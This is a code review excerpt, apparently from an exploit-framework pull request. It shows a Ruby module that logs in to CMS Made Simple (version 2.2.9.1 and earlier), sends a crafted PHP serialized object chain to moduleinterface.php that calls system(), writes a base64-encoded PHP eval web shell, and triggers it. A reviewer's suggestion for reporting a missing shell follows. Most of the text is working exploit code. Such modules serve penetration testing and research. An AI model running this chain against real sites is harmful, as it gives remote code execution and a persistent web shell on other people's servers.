modules/exploits/multi/http/cmsms_object_injection_rce.rb

```diff
@@ -0,0 +1,162 @@
+      'vars_post' => data,
+      'cookie' => @cookies
+    )
+  end
+
+  def get(path, filename)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, path, filename),
+      'method' => 'GET'
+    )
+  end
+
+  def check
+    res = get('', 'index.php')
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.body.match?(/CMS Made Simple/i)
+      return CheckCode::Safe
+    end
+
+    version = Gem::Version.new(res.body.scan(/CMS Made Simple<\/a> version (\d+\.\d+\.\d+)/).flatten.first)
+    vprint_status("#{peer} - CMS Made Simple Version: #{version}")
+
+    if version <= Gem::Version.new('2.2.9.1')
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def login
+    data = {
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'loginsubmit' => 'Submit'
+    }
+    res = post('login.php', data)
+
+    unless res
+      fail_with(Failure::NotFound,
+        'A response was not received from the remote host')
+    end
+
+    unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ %r{\/admin\?(.*)?=(.*)}
+      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+    end
+    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+    vprint_good("#{peer} - Authentication successful")
+    @csrf_name = Regexp.last_match(1)
+    csrf_val = Regexp.last_match(2)
+    @csrf = { @csrf_name => csrf_val }
+    @cookies = res.get_cookies
+  end
+
+  def send_injection
+    # prepare shell command
+    shell_name = rand_text_alpha(8..12) + '.php'
+    cmd = Rex::Text.encode_base64(payload.encoded).delete('\n', '')
+    cmd = "echo \"<?php eval(base64_decode('" + cmd + "')); ?>\" > " + shell_name
+
+    # prepare serialized object
+    final_payload = 'a:2:{s:10:"css_select";a:4:{i:0;s:2:"19";i:1;s:2:"21";i:2;O:13:"dm_xml_reader":1:{s:31:"'
+    final_payload += "\x00" + 'dm_xml_reader' + "\x00"
+    final_payload += '_old_err_handler";a:2:{i:0;O:21:"CmsLayoutTemplateType":1:{s:28:"'
+    final_payload += "\x00" + 'CmsLayoutTemplateType' + "\x00"
+    final_payload += '_data";a:2:{s:13:"help_callback";s:6:"system";s:4:"name";s:' + cmd.length.to_s + ':"' + cmd + '";}}'
+    final_payload += 'i:1;s:21:"get_template_helptext";}};i:3;s:5:"dummy";}s:15:"css_bulk_action";s:6:"export";}'
+
+    # create message with payload
+    message = Rex::MIME::Message.new
+    message.add_part(@csrf[@csrf_name], nil, nil, "form-data; name=\"#{@csrf_name}\"")
+    message.add_part('DesignManager,m1_,admin_bulk_template,0', nil, nil, 'form-data; name="mact"')
+    message.add_part(Rex::Text.encode_base64(final_payload), nil, nil, 'form-data; name="m1_allparms"')
+    data = message.to_s
+
+    # send payload
+    multipart_form_data('moduleinterface.php', data, message)
+    register_files_for_cleanup(shell_name)
+    # open shell
+    get('admin', shell_name)
```

Comment:
Perhaps it would be a good idea to check the response from the server to offer feedback in the event that exploitation failed.

ie, something like this:

```suggestion
    res = get('admin', shell_name)
    if res && res.code == 404
      print_error "Shell #{shell_name} not found"
    end
```

Optionally, you could also offer feedback `unless session_created?`